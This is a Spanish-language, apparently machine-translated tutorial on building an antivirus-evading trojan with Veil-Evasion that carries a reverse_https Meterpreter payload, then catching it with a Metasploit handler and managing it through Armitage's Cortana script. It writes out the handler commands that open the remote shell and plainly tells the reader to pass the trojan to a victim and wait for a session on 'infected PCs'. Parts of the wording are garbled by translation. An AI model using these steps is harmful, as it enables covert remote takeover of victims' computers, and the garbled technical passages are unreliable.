Veil reverce https y Armitage





Los caballos de diligencia shellcode-less, teatralizadores Meterpreter "puros" en cierto modo similares a los caballos de diligencia reverse_tcp tradicionales. 
Reverse_https Meterpreter [s] teatralizadores son en realidad un poco más simple que reverse_tcp. La idea general es la misma: el controlador sirve un archivo dll. Que el cliente luego inyecta mediante el VirtualAlloc / etc. metodología. Sin embargo, en lugar de tener que parchear el. Dll a nosotros mismos con las instrucciones de montaje y el descriptor de fichero de un conector, el manejador de Metasploit parchea el agente de usuario, método de transporte (http / https), url y expiración / tiempo de espera de la comunicación de forma dinámica, ya que sirve el Meterpreter.





Configuramos los parametros la ip atacante y el puerto de escucha




Colocamos un nombre al troyano y nos preguntara como crear el payload la opcion 1 por defecto




Se guardara el troyano en la siguiente ruta /root/veil-output/compiled/Rhinestone.exe




Creamos la sesion de handler pero esta ves utilizando un payload de reverce https






Cita:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set LHOST (IP)
msf exploit(handler) > set LPORT 3232
msf exploit(handler) > exploit -j


Solo hay que pasarle el troyano a la victima y esperar que lo ejecute y tendremos la sesión de meterpreter.





Veil y Armitage



Cortana es un lenguaje de scripting ataque basado en el sueño, ambas escritas por Raphael Mudge. Cortana permite la manipulación avanzada de Armitage , las versiones gratuitas y de pago de un entorno de tipo gui (y más) para Metasploit. (Nota: armitage está disponible gratuitamente en Kali con apt-get install armitage). Con Cortana, puede disparar en eventos específicos o acciones del usuario, interactuar con el backend Metasploit completo, modificar los menús, y mucho más. Hay algunos buenos ejemplos en github de Raffi de lo que usted puede hacer con este potente lenguaje a su alcance. 

Velo-Evasion en Armitage utilizando Cortana. Con el fin de obtener la estructura de menú deseado, Armitage (licencia BSD) código de fondo fue despojado de distancia y menús personalizados se construyeron utilizando ejemplos de código existentes de Raffi. Para cargar el guión veil_evasion.cna en Armitage, vaya a Armitage -> Scripts, seleccione el botón Cargar y navegue hasta el guión veil_evasion.cna:























Aparece una nueva pestaña en la parte superior Veil-Evasion, solo nos queda configurar el troyano pero esta vez con un entorno grafico amigable , mi recomendación es aunque armitage es bastante bueno siempre es mejor aprender manualmente cada funcion, pero para la organización de las pcs infectadas es bueno por su sistema grafico de host.